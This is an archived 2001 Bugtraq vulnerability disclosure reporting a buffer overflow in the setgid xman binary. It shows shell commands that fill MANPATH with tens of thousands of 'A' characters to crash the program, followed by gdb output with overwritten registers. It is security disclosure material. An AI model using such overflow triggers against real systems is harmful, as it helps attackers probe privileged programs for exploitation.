[21502] in bugtraq
suid xman 3.1.6 overflows
daemon@ATHENA.MIT.EDU (KF)
Mon Jul 16 00:17:00 2001
Message-ID: <3B4D1A61.F1681F89@snosoft.com>
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com, srtxg@chanae.alphanet.ch
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
overflow
srtxg@chanae.alphanet.ch is noted as the packager of this RPM. I do not
know
the author.
[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998
/usr/X11R6/bin/xman*
[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault
[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66
-KF
